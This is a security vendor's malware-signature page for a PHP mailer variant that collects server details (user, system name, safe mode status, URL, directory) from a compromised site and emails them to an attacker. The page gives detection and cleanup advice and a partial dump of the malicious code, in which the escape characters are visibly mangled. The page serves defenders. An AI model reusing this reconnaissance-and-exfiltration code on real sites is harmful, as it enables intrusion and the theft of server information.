Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.mailer.phpinfo.001

php.mailer.phpinfo.001

PHP mailers are, as the name suggests, tools intended to send e-mails using php commands. CMSs like WordPress, Joomla or Magento have builtin functions to send e-mails. However, malware creators have their own specially crafted scripts to send messages. Such scripts can be used for sending spam, phishing e-mails, flooding mailboxes or stealing and sending sensitive data back to the malware creators.
HP mailers are often part of various spam bots and other malware types, or are used for sending sensitive data back to attackers. They often use the POST method to receive the e-mail addresses and other data.
php.mailer.phpinfo, differently from the other variants ahta work more as a malware accomplice, gathers environmental informations from the compromised server and send them to the attacker.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for mail() functions on files that you don't recognize.
Check your site's access_logs for any sign of suspicious POST request, this may point out which files are being used for sending the unwanted messages.
Also you can sign up with us and let our team remove the malware for you.

Dump

$user = @get_current_user();

$uname = @php_uname();

$data = date('h-i-s, j-m-y, it is w Day z');

$safemode = @ini_get('safe_mode');

$url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

$caminho = substr($_SERVER['SCRIPT_FILENAME'], 0, strlen($_SERVER['SCRIPT_FILENAME']) - strlen(strrchr($_SERVER['SCRIPT_FILENAME'], "\")));

if ($safemode == '') {
$safemode = "OFF";
}
else { $safemode = " $SafeMode ";
}

$dados ="<b>Nome: </b>{$uname}<br>";
$dados.="<b>Safe Mode:</b>{$phpinfo['PHP Core']['safe_mode'][0]}<br />";
$dados.="<b>URL: </b>{$url}<br>";
$dados.="<b>Dir: </b>{$caminho}<br>";
$dados.="<b>System: </b>{$phpinfo['phpinfo']['System']}<br />";

$assunto = "$url";

$headers="From: <nao-responda>rn";
$headers.="MIME-Version: 1.0rn";
$headers.="Content-type: text/html; charset=iso-8859-1rn";
$headers.="X-Mailer: PHP/".phpversion()."rn";
$headers.="Message-ID: <".md5(uniqid(time()))."@".$_SERVER['SERVER_NAME'].">rn";